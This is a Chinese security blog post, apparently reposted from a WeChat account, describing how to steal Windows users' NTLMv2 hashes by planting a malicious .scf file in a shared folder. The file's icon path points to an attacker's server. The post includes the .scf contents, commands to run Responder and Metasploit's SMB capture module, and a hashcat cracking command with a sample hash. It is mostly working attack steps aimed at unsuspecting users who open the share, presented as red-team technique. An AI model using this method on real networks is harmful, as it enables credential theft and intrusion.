利用强制smb身份验证获取用户哈希

admin 2021年12月3日11:50:34评论127 views字数 728阅读2分25秒阅读模式

前言

攻击者可通过向共享目录投递连接外部服务器的资源文件,用户请求过程中尝试身份验证,会默认使用SMB协议将用户哈希发送到服务器,这样攻击者就会获取对方用户账户哈希。

创建共享目录scf文件

[Shell]
Command=2
IconFile=\X.X.X.Xshare1.ico
[Taskbar]
Command=ToggleDesktop

重命名后缀为.scf,保存在共享目录

使用responder接收哈希

使用responder开启监听

git clone https://github.com/lgandx/Responder.git
python Responder.py -wrf --lm -v -I eth0

使用任一用户访问刚才建立好的共享目录,只要进入到保存有.scf这一文件的层级就会触发smb身份验证,responder会监听到NTLMv2哈希

利用强制smb身份验证获取用户哈希

使用msf模块接收哈希

use auxiliary/server/capture/smb
run

使用hashcat配合字典来破解

hashcat -m 5600 Administrator::NEXT:b36ff0a87f24a5b2:59D4E07C55717C42B167E2FF178C0B83:01010000000000005D83AE7CFE67D701B33B25F625134A1E00000000020000000000000000000000 /root/pass.txt --force

利用强制smb身份验证获取用户哈希

作者:Leticia's Blog
---》

推荐公众号:

    每日分享红蓝队技术文章与工具使用 下载方式、以及不定期的安全类书籍抽奖~

利用强制smb身份验证获取用户哈希

本文始发于微信公众号(LemonSec):利用强制smb身份验证获取用户哈希

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月3日11:50:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用强制smb身份验证获取用户哈希http://cn-sec.com/archives/471392.html

发表评论

匿名网友 填写信息